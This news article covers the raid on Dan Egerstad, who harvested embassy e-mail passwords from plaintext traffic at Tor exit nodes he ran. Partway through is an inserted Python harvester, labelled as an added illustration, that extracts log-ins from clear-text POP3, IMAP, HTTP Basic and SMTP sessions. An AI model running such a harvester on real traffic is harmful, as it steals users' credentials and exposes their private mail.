Tor Researcher Who Exposed Embassy E-mail Passwords Gets Raided by Swedish FBI and CIA


Dan Egerstad, the Swedish computer security consultant I interviewed in August who obtained log-in and password information for 1,000 e-mail accounts belonging to foreign embassies, corporations and human rights organizations, had his house raided on Monday by Swedish officials, who took him in for questioning.

Egerstad (at right) said that on Monday morning, as he was leaving his apartment in Malmo to move his car, he opened his front door to find five plainclothes men standing at the entrance. Four of them showed him identification; the fifth would neither show identification nor give his name. He says the four with IDs belonged to the Swedish National Police (the country's national police force), and the fifth was an agent of Säpo, Sweden's security service. The agents had driven from Stockholm to Malmo to conduct the raid.

While three of them took him to the local police headquarters for questioning, the other two agents ransacked his house and hauled away three computers, external hard drives, CDs, notebooks and various papers.

"It was like out of a bad movie," Egerstad says.

Egerstad hasn't been charged with anything but is under suspicion of breaking into computers, which he says he never did. Egerstad said the agents told him they were investigating him because he had "pissed off some foreign countries."

"It seems like some foreign country has contacted Sweden and asked them to do this," Egerstad said. He asked the agents if the foreign entity that was angry with him was Hong Kong and the agents nodded and said another foreign entity was also upset with him. They didn't tell Egerstad which country that was.

Egerstad created a stir three months ago when he posted on his web site the log-in information and passwords for 100 of the 1,000 e-mail accounts for which he obtained log-ins and passwords. (His site is no longer online). He posted the information, he said, because he felt it would be the most effective way to make the account owners aware that their communication had been compromised.

Initially, Egerstad refused to disclose how he obtained the log-ins and passwords. But in September he revealed that he'd intercepted the information through five Tor exit nodes that he'd set up in Asia, the US and Europe.

Tor is used by people who want to keep their browsing and correspondence private: it routes traffic through a chain of volunteer relays so that no single relay knows both who sent a request and where it is going. Traffic is encrypted in layers between the client and the relays, but the last relay in the chain, the exit node, has to strip the final layer in order to forward the request to its destination. Tor does nothing to encrypt the application protocol inside that traffic, so if the client speaks an unencrypted protocol (plain POP3, IMAP or HTTP, for example) rather than a TLS-protected version of it, the exit operator sees the user names and passwords exactly as the mail server would. Egerstad simply sniffed the plaintext traffic passing through his five exit nodes and pulled the log-ins out of it.
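The mechanism described above, as an added illustration that is not from the original article and is not Egerstad's own tooling: a small Python harvester that takes the client-to-server bytes an exit relay would see after Tor's last encryption layer is removed, and pulls log-ins out of clear-text POP3, IMAP, HTTP Basic and SMTP AUTH PLAIN exchanges, while reporting a TLS-wrapped stream as opaque. The sample streams, account names and passwords are constructed for the example and do not come from any real capture.

```python
"""Credential harvesting as seen from a Tor exit relay (added example).

Tor strips its last layer of encryption at the exit, so the exit operator
sees exactly the application-layer bytes the client sent.  If that protocol
is itself unencrypted, log-ins go by in the clear; if the client used TLS,
the exit sees only an opaque handshake.  All sample data below is
constructed for this example.
"""
from __future__ import annotations

import base64
import re

# Constructed client-side payloads, one per stream (fabricated accounts).
SAMPLE_STREAMS = {
    "pop3": (b"USER attache@example-embassy.test\r\n"
             b"PASS Tr0ub4dor&3\r\n"),
    "imap": b'a001 LOGIN "press.office@example.test" "s3cret-pass"\r\n',
    "http_basic": (b"GET /mail/ HTTP/1.1\r\nHost: webmail.example.test\r\n"
                   b"Authorization: Basic "
                   + base64.b64encode(b"consul:hunter2") + b"\r\n\r\n"),
    "smtp_plain": (b"EHLO client\r\nAUTH PLAIN "
                   + base64.b64encode(b"\x00ambassador@example.test\x00letmein")
                   + b"\r\n"),
    # Start of a TLS ClientHello record (content type 0x16, version 3.x);
    # truncated, since only the record header matters for classification.
    "tls": bytes.fromhex("160301002d0100002903016b"),
}

IMAP_LOGIN = re.compile(r"^\S+ LOGIN (\S+) (\S+)$", re.IGNORECASE)
HTTP_BASIC = re.compile(r"^Authorization:\s*Basic\s+(\S+)$", re.IGNORECASE)
SMTP_PLAIN = re.compile(r"^AUTH PLAIN (\S+)$", re.IGNORECASE)


def is_tls(payload: bytes) -> bool:
    """True if the stream opens with a TLS record header (type 22, version 3.x)."""
    return (len(payload) >= 3 and payload[0] == 0x16
            and payload[1] == 0x03 and payload[2] <= 0x04)


def _b64(token: str) -> bytes | None:
    """Strict base64 decode; None if the token is not valid base64."""
    try:
        return base64.b64decode(token, validate=True)
    except ValueError:
        return None


def extract_credentials(payload: bytes) -> list[dict]:
    """Pull clear-text log-ins out of one client->server stream.

    Handles POP3 USER/PASS, IMAP LOGIN with quoted (not literal {n})
    arguments, HTTP Basic and SMTP AUTH PLAIN.  A TLS stream yields nothing:
    the exit only ever sees the handshake and encrypted records.
    """
    found: list[dict] = []
    if is_tls(payload):
        return found
    pending_user = None  # POP3 sends USER and PASS as separate commands
    for line in payload.decode("latin-1").split("\r\n"):
        upper = line.upper()
        if upper.startswith("USER "):
            pending_user = line[5:]
        elif upper.startswith("PASS ") and pending_user is not None:
            found.append({"proto": "pop3", "user": pending_user,
                          "password": line[5:]})
            pending_user = None
        elif (m := IMAP_LOGIN.match(line)):
            found.append({"proto": "imap", "user": m.group(1).strip('"'),
                          "password": m.group(2).strip('"')})
        elif (m := HTTP_BASIC.match(line)):
            raw = _b64(m.group(1))
            if raw is not None and b":" in raw:
                user, _, pw = raw.decode("latin-1").partition(":")
                found.append({"proto": "http-basic", "user": user,
                              "password": pw})
        elif (m := SMTP_PLAIN.match(line)):
            raw = _b64(m.group(1))
            parts = raw.split(b"\x00") if raw is not None else []
            if len(parts) == 3:  # authzid \0 authcid \0 password
                found.append({"proto": "smtp-auth-plain",
                              "user": parts[1].decode("latin-1"),
                              "password": parts[2].decode("latin-1")})
    return found


def audit(streams: dict[str, bytes]) -> dict[str, str]:
    """Report, per stream, whether the exit could harvest a log-in from it."""
    report = {}
    for name, payload in streams.items():
        if is_tls(payload):
            report[name] = "opaque to the exit (TLS)"
        else:
            n = len(extract_credentials(payload))
            report[name] = (f"CLEAR TEXT: {n} log-in(s) harvested" if n
                            else "clear text, no log-in seen")
    return report


if __name__ == "__main__":
    for name, verdict in audit(SAMPLE_STREAMS).items():
        print(f"{name:11s} {verdict}")
        for cred in extract_credentials(SAMPLE_STREAMS[name]):
            print(f"            {cred['proto']}: {cred['user']} / {cred['password']}")
```

The point the audit makes is that the exit operator's vantage point is identical for every stream; the only thing that decides whether a log-in is exposed is whether the client wrapped its mail or web session in TLS before handing it to Tor. The same harvester run over real traffic would also see credentials from users who never touched Tor themselves, which is exactly the scenario the article goes on to discuss.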

Egerstad didn't hack any systems to obtain the data and therefore says he didn't break any laws, but once he posted the log-in details online he handed others everything they needed to get into the accounts and read the sensitive correspondence stored in them. As I mentioned in August, a reporter for the Indian Express newspaper was able to access the e-mail account belonging to India's ambassador to China and obtained the transcript of a meeting between the ambassador and the Chinese foreign minister.

As Egerstad and I discussed the problem in August, we both came to the conclusion that the embassy employees were likely not using Tor and probably didn't even know what Tor was. Instead, we suspected that the traffic he sniffed belonged to someone who had already hacked the accounts and was eavesdropping on them via the Tor network. As that intruder's sessions passed through Egerstad's Tor exit nodes, he was able to read them as well.

So who was responsible for hacking the accounts? The likely suspect -- given that most of the accounts Egerstad uncovered belonged to embassies, foreign and defense ministry officials, legislators and human rights groups -- was a government or intelligence agency. I attempted to contact several of the account holders in August to ask them whether they used Tor or knew that their accounts had been compromised but never received a response from any of them.

Egerstad told me today that he has since received confirmation that two of the e-mail accounts he exposed in August were indeed hacked by unknown intruders before he exposed them. He wouldn't say which accounts those were or in what country the accounts resided.

Photo: Dan Egerstad
